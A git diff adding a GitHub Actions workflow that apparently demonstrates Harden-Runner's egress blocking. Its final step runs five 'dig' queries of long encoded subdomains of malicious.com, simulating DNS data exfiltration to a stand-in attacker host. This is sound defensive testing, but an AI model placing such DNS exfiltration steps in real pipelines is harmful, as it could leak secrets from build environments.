diff --git a/.github/workflows/block-dns-exfiltration.yaml b/.github/workflows/block-dns-exfiltration.yaml
new file mode 100644
index 000000000..767d5d981
--- /dev/null
+++ b/.github/workflows/block-dns-exfiltration.yaml
@@ -0,0 +1,26 @@
+name: Block DNS Exfiltration With Harden-Runner
+on:
+  workflow_dispatch:
+jobs:
+  build:
+    name: Deploy
+    runs-on: ubuntu-latest
+    steps:
+      - name: Harden Runner
+        uses: step-security/harden-runner@v2
+        with:
+          egress-policy: block
+          allowed-endpoints: |
+            github.com:443
+
+      - name: Code Checkout
+        uses: actions/checkout@v4
+
+      # DNS Data Exfiltration
+      - name: DNS Data Exfiltration
+        run: |
+          dig wI25mMRFgqmHdg6Se7F3qcRPg6mHxTXgoroAcQcu0ukreCZVj3ccl1OE4nhT.malicious.com
+          dig AjgjtZpoQFBk3CA9x2ic1OL4X6cSAbpPGscvTcxlZshd52cmJz6vYf4voTmo.malicious.com
+          dig uVqkyYsy48uC9q6oZEirkVK7sdHaSCx5v5BitwaBnTjKsjlRamhW6vP1pXNu.malicious.com
+          dig M6VzSkW4v7KPE0SILITZxLnrrBJiSxRYb0hUBiFJdIz2VpBJwkNOH3MEhesc.malicious.com
+          dig xd2rqUt1L0RN8IbthvNkOCyhR2FHneUESSM12Gq6ToNxFZkFY0W5KWUnxLtN.malicious.com